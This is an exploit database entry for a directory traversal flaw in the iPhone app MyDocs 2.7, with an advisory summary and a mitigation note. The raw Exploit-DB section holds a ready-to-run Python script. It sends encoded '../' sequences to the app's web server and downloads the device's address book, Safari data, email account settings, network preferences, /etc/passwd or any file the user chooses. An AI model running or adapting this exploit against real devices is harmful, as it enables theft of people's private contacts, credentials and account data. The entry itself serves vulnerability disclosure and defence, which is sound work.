iPhone MyDocs 2.7 Directory Traversal

vendor:

iPhone MyDocs

by:

Khashayar Fereidani

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: iPhone MyDocs

Affected Version From: 2.7

Affected Version To: 2.7

Patch Exists: NO

Related CWE: N/A

CPE: a:apple:iphone_mydocs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone 4 (IOS 4.0.1)

2011

iPhone MyDocs 2.7 Directory Traversal

A directory traversal vulnerability exists in iPhone MyDocs 2.7 which allows an attacker to access sensitive files on the system. The vulnerability is due to insufficient input validation when handling user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request containing directory traversal sequences (e.g., '../') to the vulnerable application. This can allow the attacker to access sensitive files on the system, such as the /etc/passwd file. Successful exploitation of this vulnerability can result in the disclosure of sensitive information.

Mitigation:

Input validation should be performed to ensure that user-supplied input does not contain directory traversal sequences. Additionally, access to sensitive files should be restricted to only those users who require access.

Source

Exploit-DB raw data:

----------------------------------------------------------------
Software : iPhone MyDocs 2.7
Type of vunlnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://ax.itunes.apple.com/app/id358347809?mt=8
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

Exploit:

#!/usr/bin/python
import urllib2
def urlread(url,file):
	url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
	u = urllib2.urlopen(url)
	localFile = open('result.html', 'w')
	localFile.write(u.read())
	localFile.close()
	print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone MyDocs 2.7 DT                 -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                    -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
	url='http://'+url
if ((id>0) and (id<6)):
	file=f[id]
	urlread(url,file)
if (id==6):
	file=raw_input("Enter Local File Address : ")
	urlread(url,file)